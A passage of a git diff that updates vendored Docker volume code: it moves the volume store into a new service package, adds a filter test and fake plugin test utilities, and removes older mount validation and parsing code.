+		assert.Check(t, err)
+	}
+
+	s, err := NewStore(dir, volumedrivers.NewStore(nil))
+	assert.Check(t, err)
+	return s, func() {
+		s.Shutdown()
+		cleanup()
+	}
+}
+
+func TestFilterFunc(t *testing.T) {
+	testDriver := volumetestutils.NewFakeDriver("test")
+	testVolume, err := testDriver.Create("test", nil)
+	assert.NilError(t, err)
+	testVolume2, err := testDriver.Create("test2", nil)
+	assert.NilError(t, err)
+	testVolume3, err := testDriver.Create("test3", nil)
+	assert.NilError(t, err)
+
+	for _, test := range []struct {
+		vols   []volume.Volume
+		fn     filterFunc
+		desc   string
+		expect []volume.Volume
+	}{
+		{desc: "test nil list", vols: nil, expect: nil, fn: func(volume.Volume) bool { return true }},
+		{desc: "test empty list", vols: []volume.Volume{}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return true }},
+		{desc: "test filter non-empty to empty", vols: []volume.Volume{testVolume}, expect: []volume.Volume{}, fn: func(volume.Volume) bool { return false }},
+		{desc: "test nothing to fitler non-empty list", vols: []volume.Volume{testVolume}, expect: []volume.Volume{testVolume}, fn: func(volume.Volume) bool { return true }},
+		{desc: "test filter some", vols: []volume.Volume{testVolume, testVolume2}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() == testVolume.Name() }},
+		{desc: "test filter middle", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume, testVolume3}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() }},
+		{desc: "test filter middle and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume}, fn: func(v volume.Volume) bool { return v.Name() != testVolume2.Name() && v.Name() != testVolume3.Name() }},
+		{desc: "test filter first and last", vols: []volume.Volume{testVolume, testVolume2, testVolume3}, expect: []volume.Volume{testVolume2}, fn: func(v volume.Volume) bool { return v.Name() != testVolume.Name() && v.Name() != testVolume3.Name() }},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			test := test
+			t.Parallel()
+
+			filter(&test.vols, test.fn)
+			assert.DeepEqual(t, test.vols, test.expect, cmpVolume)
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/service/store_unix.go b/vendor/github.com/docker/docker/volume/service/store_unix.go
new file mode 100644
index 0000000000..4ccc4b9999
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/store_unix.go
@@ -0,0 +1,9 @@
+// +build linux freebsd darwin
+
+package service // import "github.com/docker/docker/volume/service"
+
+// normalizeVolumeName is a platform specific function to normalize the name
+// of a volume. This is a no-op on Unix-like platforms
+func normalizeVolumeName(name string) string {
+	return name
+}
diff --git a/vendor/github.com/docker/docker/volume/store/store_windows.go b/vendor/github.com/docker/docker/volume/service/store_windows.go
similarity index 59%
rename from vendor/github.com/docker/docker/volume/store/store_windows.go
rename to vendor/github.com/docker/docker/volume/service/store_windows.go
index 8601cdd5cf..bd46a6893e 100644
--- a/vendor/github.com/docker/docker/volume/store/store_windows.go
+++ b/vendor/github.com/docker/docker/volume/service/store_windows.go
@@ -1,12 +1,12 @@
-package store
+package service // import "github.com/docker/docker/volume/service"
 
 import "strings"
 
-// normaliseVolumeName is a platform specific function to normalise the name
+// normalizeVolumeName is a platform specific function to normalize the name
 // of a volume. On Windows, as NTFS is case insensitive, under
 // c:\ProgramData\Docker\Volumes\, the folders John and john would be synonymous.
 // Hence we can't allow the volume "John" and "john" to be created as separate
 // volumes.
-func normaliseVolumeName(name string) string {
+func normalizeVolumeName(name string) string {
 	return strings.ToLower(name)
 }
diff --git a/vendor/github.com/docker/docker/volume/store/store_test.go b/vendor/github.com/docker/docker/volume/store/store_test.go
deleted file mode 100644
index b52f720ca1..0000000000
--- a/vendor/github.com/docker/docker/volume/store/store_test.go
+++ /dev/null
@@ -1,234 +0,0 @@
-package store
-
-import (
-	"errors"
-	"io/ioutil"
-	"os"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/volume/drivers"
-	volumetestutils "github.com/docker/docker/volume/testutils"
-)
-
-func TestCreate(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	defer volumedrivers.Unregister("fake")
-	dir, err := ioutil.TempDir("", "test-create")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(dir)
-
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-	v, err := s.Create("fake1", "fake", nil, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if v.Name() != "fake1" {
-		t.Fatalf("Expected fake1 volume, got %v", v)
-	}
-	if l, _, _ := s.List(); len(l) != 1 {
-		t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l)
-	}
-
-	if _, err := s.Create("none", "none", nil, nil); err == nil {
-		t.Fatalf("Expected unknown driver error, got nil")
-	}
-
-	_, err = s.Create("fakeerror", "fake", map[string]string{"error": "create error"}, nil)
-	expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")}
-	if err != nil && err.Error() != expected.Error() {
-		t.Fatalf("Expected create fakeError: create error, got %v", err)
-	}
-}
-
-func TestRemove(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
-	defer volumedrivers.Unregister("fake")
-	defer volumedrivers.Unregister("noop")
-	dir, err := ioutil.TempDir("", "test-remove")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(dir)
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	// doing string compare here since this error comes directly from the driver
-	expected := "no such volume"
-	if err := s.Remove(volumetestutils.NoopVolume{}); err == nil || !strings.Contains(err.Error(), expected) {
-		t.Fatalf("Expected error %q, got %v", expected, err)
-	}
-
-	v, err := s.CreateWithRef("fake1", "fake", "fake", nil, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if err := s.Remove(v); !IsInUse(err) {
-		t.Fatalf("Expected ErrVolumeInUse error, got %v", err)
-	}
-	s.Dereference(v, "fake")
-	if err := s.Remove(v); err != nil {
-		t.Fatal(err)
-	}
-	if l, _, _ := s.List(); len(l) != 0 {
-		t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l)
-	}
-}
-
-func TestList(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2")
-	defer volumedrivers.Unregister("fake")
-	defer volumedrivers.Unregister("fake2")
-	dir, err := ioutil.TempDir("", "test-list")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(dir)
-
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := s.Create("test", "fake", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := s.Create("test2", "fake2", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	ls, _, err := s.List()
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(ls) != 2 {
-		t.Fatalf("expected 2 volumes, got: %d", len(ls))
-	}
-	if err := s.Shutdown(); err != nil {
-		t.Fatal(err)
-	}
-
-	// and again with a new store
-	s, err = New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-	ls, _, err = s.List()
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(ls) != 2 {
-		t.Fatalf("expected 2 volumes, got: %d", len(ls))
-	}
-}
-
-func TestFilterByDriver(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
-	defer volumedrivers.Unregister("fake")
-	defer volumedrivers.Unregister("noop")
-	dir, err := ioutil.TempDir("", "test-filter-driver")
-	if err != nil {
-		t.Fatal(err)
-	}
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := s.Create("fake1", "fake", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := s.Create("fake2", "fake", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := s.Create("fake3", "noop", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	if l, _ := s.FilterByDriver("fake"); len(l) != 2 {
-		t.Fatalf("Expected 2 volumes, got %v, %v", len(l), l)
-	}
-
-	if l, _ := s.FilterByDriver("noop"); len(l) != 1 {
-		t.Fatalf("Expected 1 volume, got %v, %v", len(l), l)
-	}
-}
-
-func TestFilterByUsed(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	volumedrivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
-	dir, err := ioutil.TempDir("", "test-filter-used")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := s.Create("fake2", "fake", nil, nil); err != nil {
-		t.Fatal(err)
-	}
-
-	vols, _, err := s.List()
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	dangling := s.FilterByUsed(vols, false)
-	if len(dangling) != 1 {
-		t.Fatalf("expected 1 danging volume, got %v", len(dangling))
-	}
-	if dangling[0].Name() != "fake2" {
-		t.Fatalf("expected danging volume fake2, got %s", dangling[0].Name())
-	}
-
-	used := s.FilterByUsed(vols, true)
-	if len(used) != 1 {
-		t.Fatalf("expected 1 used volume, got %v", len(used))
-	}
-	if used[0].Name() != "fake1" {
-		t.Fatalf("expected used volume fake1, got %s", used[0].Name())
-	}
-}
-
-func TestDerefMultipleOfSameRef(t *testing.T) {
-	volumedrivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
-	dir, err := ioutil.TempDir("", "test-same-deref")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	s, err := New(dir)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	v, err := s.CreateWithRef("fake1", "fake", "volReference", nil, nil)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := s.GetWithRef("fake1", "fake", "volReference"); err != nil {
-		t.Fatal(err)
-	}
-
-	s.Dereference(v, "volReference")
-	if err := s.Remove(v); err != nil {
-		t.Fatal(err)
-	}
-}
diff --git a/vendor/github.com/docker/docker/volume/store/store_unix.go b/vendor/github.com/docker/docker/volume/store/store_unix.go
deleted file mode 100644
index 8ebc1f20c7..0000000000
--- a/vendor/github.com/docker/docker/volume/store/store_unix.go
+++ /dev/null
@@ -1,9 +0,0 @@
-// +build linux freebsd solaris
-
-package store
-
-// normaliseVolumeName is a platform specific function to normalise the name
-// of a volume. This is a no-op on Unix-like platforms
-func normaliseVolumeName(name string) string {
-	return name
-}
diff --git a/vendor/github.com/docker/docker/volume/testutils/testutils.go b/vendor/github.com/docker/docker/volume/testutils/testutils.go
index 2dbac02fdb..5bb38e3f33 100644
--- a/vendor/github.com/docker/docker/volume/testutils/testutils.go
+++ b/vendor/github.com/docker/docker/volume/testutils/testutils.go
@@ -1,8 +1,15 @@
-package testutils
+package testutils // import "github.com/docker/docker/volume/testutils"
 
 import (
+	"encoding/json"
+	"errors"
 	"fmt"
+	"net"
+	"net/http"
+	"time"
 
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/plugins"
 	"github.com/docker/docker/volume"
 )
 
@@ -24,9 +31,12 @@ func (NoopVolume) Mount(_ string) (string, error) { return "noop", nil }
 // Unmount unmounts the volume from the container
 func (NoopVolume) Unmount(_ string) error { return nil }
 
-// Status proivdes low-level details about the volume
+// Status provides low-level details about the volume
 func (NoopVolume) Status() map[string]interface{} { return nil }
 
+// CreatedAt provides the time the volume (directory) was created at
+func (NoopVolume) CreatedAt() (time.Time, error) { return time.Now(), nil }
+
 // FakeVolume is a fake volume with a random name
 type FakeVolume struct {
 	name       string
@@ -53,8 +63,13 @@ func (FakeVolume) Mount(_ string) (string, error) { return "fake", nil }
 // Unmount unmounts the volume from the container
 func (FakeVolume) Unmount(_ string) error { return nil }
 
-// Status proivdes low-level details about the volume
-func (FakeVolume) Status() map[string]interface{} { return nil }
+// Status provides low-level details about the volume
+func (FakeVolume) Status() map[string]interface{} {
+	return map[string]interface{}{"datakey": "datavalue"}
+}
+
+// CreatedAt provides the time the volume (directory) was created at
+func (FakeVolume) CreatedAt() (time.Time, error) { return time.Now(), nil }
 
 // FakeDriver is a driver that generates fake volumes
 type FakeDriver struct {
@@ -114,3 +129,99 @@ func (d *FakeDriver) Get(name string) (volume.Volume, error) {
 func (*FakeDriver) Scope() string {
 	return "local"
 }
+
+type fakePlugin struct {
+	client *plugins.Client
+	name   string
+	refs   int
+}
+
+// MakeFakePlugin creates a fake plugin from the passed in driver
+// Note: currently only "Create" is implemented because that's all that's needed
+// so far. If you need it to test something else, add it here, but probably you
+// shouldn't need to use this except for very specific cases with v2 plugin handling.
+func MakeFakePlugin(d volume.Driver, l net.Listener) (plugingetter.CompatPlugin, error) {
+	c, err := plugins.NewClient(l.Addr().Network()+"://"+l.Addr().String(), nil)
+	if err != nil {
+		return nil, err
+	}
+	mux := http.NewServeMux()
+
+	mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) {
+		createReq := struct {
+			Name string
+			Opts map[string]string
+		}{}
+		if err := json.NewDecoder(r.Body).Decode(&createReq); err != nil {
+			fmt.Fprintf(w, `{"Err": "%s"}`, err.Error())
+			return
+		}
+		_, err := d.Create(createReq.Name, createReq.Opts)
+		if err != nil {
+			fmt.Fprintf(w, `{"Err": "%s"}`, err.Error())
+			return
+		}
+		w.Write([]byte("{}"))
+	})
+
+	go http.Serve(l, mux)
+	return &fakePlugin{client: c, name: d.Name()}, nil
+}
+
+func (p *fakePlugin) Client() *plugins.Client {
+	return p.client
+}
+
+func (p *fakePlugin) Name() string {
+	return p.name
+}
+
+func (p *fakePlugin) IsV1() bool {
+	return false
+}
+
+func (p *fakePlugin) ScopedPath(s string) string {
+	return s
+}
+
+type fakePluginGetter struct {
+	plugins map[string]plugingetter.CompatPlugin
+}
+
+// NewFakePluginGetter returns a plugin getter for fake plugins
+func NewFakePluginGetter(pls ...plugingetter.CompatPlugin) plugingetter.PluginGetter {
+	idx := make(map[string]plugingetter.CompatPlugin, len(pls))
+	for _, p := range pls {
+		idx[p.Name()] = p
+	}
+	return &fakePluginGetter{plugins: idx}
+}
+
+// This ignores the second argument since we only care about volume drivers here,
+// there shouldn't be any other kind of plugin in here
+func (g *fakePluginGetter) Get(name, _ string, mode int) (plugingetter.CompatPlugin, error) {
+	p, ok := g.plugins[name]
+	if !ok {
+		return nil, errors.New("not found")
+	}
+	p.(*fakePlugin).refs += mode
+	return p, nil
+}
+
+func (g *fakePluginGetter) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, error) {
+	panic("GetAllByCap shouldn't be called")
+}
+
+func (g *fakePluginGetter) GetAllManagedPluginsByCap(capability string) []plugingetter.CompatPlugin {
+	panic("GetAllManagedPluginsByCap should not be called")
+}
+
+func (g *fakePluginGetter) Handle(capability string, callback func(string, *plugins.Client)) {
+	panic("Handle should not be called")
+}
+
+// FakeRefs checks ref count on a fake plugin.
+func FakeRefs(p plugingetter.CompatPlugin) int {
+	// this should panic if something other than a `*fakePlugin` is passed in
+	return p.(*fakePlugin).refs
+}
diff --git a/vendor/github.com/docker/docker/volume/validate.go b/vendor/github.com/docker/docker/volume/validate.go
deleted file mode 100644
index 27a8c5d5b0..0000000000
--- a/vendor/github.com/docker/docker/volume/validate.go
+++ /dev/null
@@ -1,125 +0,0 @@
-package volume
-
-import (
-	"errors"
-	"fmt"
-	"os"
-	"path/filepath"
-
-	"github.com/docker/docker/api/types/mount"
-)
-
-var errBindNotExist = errors.New("bind source path does not exist")
-
-type validateOpts struct {
-	skipBindSourceCheck   bool
-	skipAbsolutePathCheck bool
-}
-
-func validateMountConfig(mnt *mount.Mount, options ...func(*validateOpts)) error {
-	opts := validateOpts{}
-	for _, o := range options {
-		o(&opts)
-	}
-
-	if len(mnt.Target) == 0 {
-		return &errMountConfig{mnt, errMissingField("Target")}
-	}
-
-	if err := validateNotRoot(mnt.Target); err != nil {
-		return &errMountConfig{mnt, err}
-	}
-
-	if !opts.skipAbsolutePathCheck {
-		if err := validateAbsolute(mnt.Target); err != nil {
-			return &errMountConfig{mnt, err}
-		}
-	}
-
-	switch mnt.Type {
-	case mount.TypeBind:
-		if len(mnt.Source) == 0 {
-			return &errMountConfig{mnt, errMissingField("Source")}
-		}
-		// Don't error out just because the propagation mode is not supported on the platform
-		if opts := mnt.BindOptions; opts != nil {
-			if len(opts.Propagation) > 0 && len(propagationModes) > 0 {
-				if _, ok := propagationModes[opts.Propagation]; !ok {
-					return &errMountConfig{mnt, fmt.Errorf("invalid propagation mode: %s", opts.Propagation)}
-				}
-			}
-		}
-		if mnt.VolumeOptions != nil {
-			return &errMountConfig{mnt, errExtraField("VolumeOptions")}
-		}
-
-		if err := validateAbsolute(mnt.Source); err != nil {
-			return &errMountConfig{mnt, err}
-		}
-
-		// Do not allow binding to non-existent path
-		if !opts.skipBindSourceCheck {
-			fi, err := os.Stat(mnt.Source)
-			if err != nil {
-				if !os.IsNotExist(err) {
-					return &errMountConfig{mnt, err}
-				}
-				return &errMountConfig{mnt, errBindNotExist}
-			}
-			if err := validateStat(fi); err != nil {
-				return &errMountConfig{mnt, err}
-			}
-		}
-	case mount.TypeVolume:
-		if mnt.BindOptions != nil {
-			return &errMountConfig{mnt, errExtraField("BindOptions")}
-		}
-
-		if len(mnt.Source) == 0 && mnt.ReadOnly {
-			return &errMountConfig{mnt, fmt.Errorf("must not set ReadOnly mode when using anonymous volumes")}
-		}
-
-		if len(mnt.Source) != 0 {
-			if valid, err := IsVolumeNameValid(mnt.Source); !valid {
-				if err == nil {
-					err = errors.New("invalid volume name")
-				}
-				return &errMountConfig{mnt, err}
-			}
-		}
-	case mount.TypeTmpfs:
-		if len(mnt.Source) != 0 {
-			return &errMountConfig{mnt, errExtraField("Source")}
-		}
-		if _, err := ConvertTmpfsOptions(mnt.TmpfsOptions, mnt.ReadOnly); err != nil {
-			return &errMountConfig{mnt, err}
-		}
-	default:
-		return &errMountConfig{mnt, errors.New("mount type unknown")}
-	}
-	return nil
-}
-
-type errMountConfig struct {
-	mount *mount.Mount
-	err   error
-}
-
-func (e *errMountConfig) Error() string {
-	return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error())
-}
-
-func errExtraField(name string) error {
-	return fmt.Errorf("field %s must not be specified", name)
-}
-func errMissingField(name string) error {
-	return fmt.Errorf("field %s must not be empty", name)
-}
-
-func validateAbsolute(p string) error {
-	p = convertSlash(p)
-	if filepath.IsAbs(p) {
-		return nil
-	}
-	return fmt.Errorf("invalid mount path: '%s' mount path must be absolute", p)
-}
diff --git a/vendor/github.com/docker/docker/volume/validate_test.go b/vendor/github.com/docker/docker/volume/validate_test.go
deleted file mode 100644
index 8732500fc0..0000000000
--- a/vendor/github.com/docker/docker/volume/validate_test.go
+++ /dev/null
@@ -1,43 +0,0 @@
-package volume
-
-import (
-	"errors"
-	"io/ioutil"
-	"os"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/api/types/mount"
-)
-
-func TestValidateMount(t *testing.T) {
-	testDir, err := ioutil.TempDir("", "test-validate-mount")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(testDir)
-
-	cases := []struct {
-		input    mount.Mount
-		expected error
-	}{
-		{mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")},
-		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil},
-		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil},
-		{mount.Mount{Type: mount.TypeBind}, errMissingField("Target")},
-		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")},
-		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")},
-		{mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist},
-		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil},
-		{mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")},
-	}
-	for i, x := range cases {
-		err := validateMountConfig(&x.input)
-		if err == nil && x.expected == nil {
-			continue
-		}
-		if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) {
-			t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go
index f3227fe485..61c8243979 100644
--- a/vendor/github.com/docker/docker/volume/volume.go
+++ b/vendor/github.com/docker/docker/volume/volume.go
@@ -1,17 +1,7 @@
-package volume
+package volume // import "github.com/docker/docker/volume"
 
 import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"strings"
-	"syscall"
-
-	mounttypes "github.com/docker/docker/api/types/mount"
-	"github.com/docker/docker/pkg/idtools"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/opencontainers/runc/libcontainer/label"
-	"github.com/pkg/errors"
+	"time"
 )
 
 // DefaultDriverName is the driver name used for the driver
@@ -29,7 +19,7 @@ const (
 type Driver interface {
 	// Name returns the name of the volume driver.
 	Name() string
-	// Create makes a new volume with the given id.
+	// Create makes a new volume with the given name.
 	Create(name string, opts map[string]string) (Volume, error)
 	// Remove deletes the volume.
 	Remove(vol Volume) (err error)
@@ -64,6 +54,8 @@ type Volume interface {
 	Mount(id string) (string, error)
 	// Unmount unmounts the volume when it is no longer in use.
 	Unmount(id string) error
+	// CreatedAt returns Volume Creation time
+	CreatedAt() (time.Time, error)
 	// Status returns low-level status information about a volume
 	Status() map[string]interface{}
 }
@@ -75,249 +67,3 @@ type DetailedVolume interface {
 	Scope() string
 	Volume
 }
-
-// MountPoint is the intersection point between a volume and a container. It
-// specifies which volume is to be used and where inside a container it should
-// be mounted.
-type MountPoint struct {
-	// Source is the source path of the mount.
-	// E.g. `mount --bind /foo /bar`, `/foo` is the `Source`.
-	Source string
-	// Destination is the path relative to the container root (`/`) to the mount point
-	// It is where the `Source` is mounted to
-	Destination string
-	// RW is set to true when the mountpoint should be mounted as read-write
-	RW bool
-	// Name is the name reference to the underlying data defined by `Source`
-	// e.g., the volume name
-	Name string
-	// Driver is the volume driver used to create the volume (if it is a volume)
-	Driver string
-	// Type of mount to use, see `Type<foo>` definitions in github.com/docker/docker/api/types/mount
-	Type mounttypes.Type `json:",omitempty"`
-	// Volume is the volume providing data to this mountpoint.
-	// This is nil unless `Type` is set to `TypeVolume`
-	Volume Volume `json:"-"`
-
-	// Mode is the comma separated list of options supplied by the user when creating
-	// the bind/volume mount.
-	// Note Mode is not used on Windows
-	Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`"
-
-	// Propagation describes how the mounts are propagated from the host into the
-	// mount point, and vice-versa.
-	// See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt
-	// Note Propagation is not used on Windows
-	Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string
-
-	// Specifies if data should be copied from the container before the first mount
-	// Use a pointer here so we can tell if the user set this value explicitly
-	// This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated
-	CopyData bool `json:"-"`
-	// ID is the opaque ID used to pass to the volume driver.
-	// This should be set by calls to `Mount` and unset by calls to `Unmount`
-	ID string `json:",omitempty"`
-
-	// Sepc is a copy of the API request that created this mount.
-	Spec mounttypes.Mount
-}
-
-// Setup sets up a mount point by either mounting the volume if it is
-// configured, or creating the source directory if supplied.
-func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) {
-	if m.Volume != nil {
-		id := m.ID
-		if id == "" {
-			id = stringid.GenerateNonCryptoID()
-		}
-		path, err := m.Volume.Mount(id)
-		if err != nil {
-			return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source)
-		}
-		m.ID = id
-		return path, nil
-	}
-	if len(m.Source) == 0 {
-		return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined")
-	}
-	// system.MkdirAll() produces an error if m.Source exists and is a file (not a directory),
-	if m.Type == mounttypes.TypeBind {
-		// idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory)
-		// also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it
-		if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil {
-			if perr, ok := err.(*os.PathError); ok {
-				if perr.Err != syscall.ENOTDIR {
-					return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source)
-				}
-			}
-		}
-	}
-	if label.RelabelNeeded(m.Mode) {
-		if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil {
-			return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source)
-		}
-	}
-	return m.Source, nil
-}
-
-// Path returns the path of a volume in a mount point.
-func (m *MountPoint) Path() string {
-	if m.Volume != nil {
-		return m.Volume.Path()
-	}
-	return m.Source
-}
-
-// ParseVolumesFrom ensures that the supplied volumes-from is valid.
-func ParseVolumesFrom(spec string) (string, string, error) {
-	if len(spec) == 0 {
-		return "", "", fmt.Errorf("volumes-from specification cannot be an empty string")
-	}
-
-	specParts := strings.SplitN(spec, ":", 2)
-	id := specParts[0]
-	mode := "rw"
-
-	if len(specParts) == 2 {
-		mode = specParts[1]
-		if !ValidMountMode(mode) {
-			return "", "", errInvalidMode(mode)
-		}
-		// For now don't allow propagation properties while importing
-		// volumes from data container. These volumes will inherit
-		// the same propagation property as of the original volume
-		// in data container. This probably can be relaxed in future.
-		if HasPropagation(mode) {
-			return "", "", errInvalidMode(mode)
-		}
-		// Do not allow copy modes on volumes-from
-		if _, isSet := getCopyMode(mode); isSet {
-			return "", "", errInvalidMode(mode)
-		}
-	}
-	return id, mode, nil
-}
-
-// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a
-// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to
-// validate the spec and create a MountPoint
-func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) {
-	arr, err := splitRawSpec(convertSlash(raw))
-	if err != nil {
-		return nil, err
-	}
-
-	var spec mounttypes.Mount
-	var mode string
-	switch len(arr) {
-	case 1:
-		// Just a destination path in the container
-		spec.Target = arr[0]
-	case 2:
-		if ValidMountMode(arr[1]) {
-			// Destination + Mode is not a valid volume - volumes
-			// cannot include a mode. eg /foo:rw
-			return nil, errInvalidSpec(raw)
-		}
-		// Host Source Path or Name + Destination
-		spec.Source = arr[0]
-		spec.Target = arr[1]
-	case 3:
-		// HostSourcePath+DestinationPath+Mode
-		spec.Source = arr[0]
-		spec.Target = arr[1]
-		mode = arr[2]
-	default:
-		return nil, errInvalidSpec(raw)
-	}
-
-	if !ValidMountMode(mode) {
-		return nil, errInvalidMode(mode)
-	}
-
-	if filepath.IsAbs(spec.Source) {
-		spec.Type = mounttypes.TypeBind
-	} else {
-		spec.Type = mounttypes.TypeVolume
-	}
-
-	spec.ReadOnly = !ReadWrite(mode)
-
-	// cannot assume that if a volume driver is passed in that we should set it
-	if volumeDriver != "" && spec.Type == mounttypes.TypeVolume {
-		spec.VolumeOptions = &mounttypes.VolumeOptions{
-			DriverConfig: &mounttypes.Driver{Name: volumeDriver},
-		}
-	}
-
-	if copyData, isSet := getCopyMode(mode); isSet {
-		if spec.VolumeOptions == nil {
-			spec.VolumeOptions = &mounttypes.VolumeOptions{}
-		}
-		spec.VolumeOptions.NoCopy = !copyData
-	}
-	if HasPropagation(mode) {
-		spec.BindOptions = &mounttypes.BindOptions{
-			Propagation: GetPropagation(mode),
-		}
-	}
-
-	mp, err := ParseMountSpec(spec, platformRawValidationOpts...)
-	if mp != nil {
-		mp.Mode = mode
-	}
-	if err != nil {
-		err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err)
-	}
-	return mp, err
-}
-
-// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it.
-func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) {
-	if err := validateMountConfig(&cfg, options...); err != nil {
-		return nil, err
-	}
-	mp := &MountPoint{
-		RW:          !cfg.ReadOnly,
-		Destination: clean(convertSlash(cfg.Target)),
-		Type:        cfg.Type,
-		Spec:        cfg,
-	}
-
-	switch cfg.Type {
-	case mounttypes.TypeVolume:
-		if cfg.Source == "" {
-			mp.Name = stringid.GenerateNonCryptoID()
-		} else {
-			mp.Name = cfg.Source
-		}
-		mp.CopyData = DefaultCopyMode
-
-		if cfg.VolumeOptions != nil {
-			if cfg.VolumeOptions.DriverConfig != nil {
-				mp.Driver = cfg.VolumeOptions.DriverConfig.Name
-			}
-			if cfg.VolumeOptions.NoCopy {
-				mp.CopyData = false
-			}
-		}
-	case mounttypes.TypeBind:
-		mp.Source = clean(convertSlash(cfg.Source))
-		if cfg.BindOptions != nil {
-			if len(cfg.BindOptions.Propagation) > 0 {
-				mp.Propagation = cfg.BindOptions.Propagation
-			}
-		}
-	case mounttypes.TypeTmpfs:
-		// NOP
-	}
-	return mp, nil
-}
-
-func errInvalidMode(mode string) error {
-	return fmt.Errorf("invalid mode: %v", mode)
-}
-
-func errInvalidSpec(spec string) error {
-	return fmt.Errorf("invalid volume specification: '%s'", spec)
-}
diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go b/vendor/github.com/docker/docker/volume/volume_copy_unix.go
deleted file mode 100644
index ad66e17637..0000000000
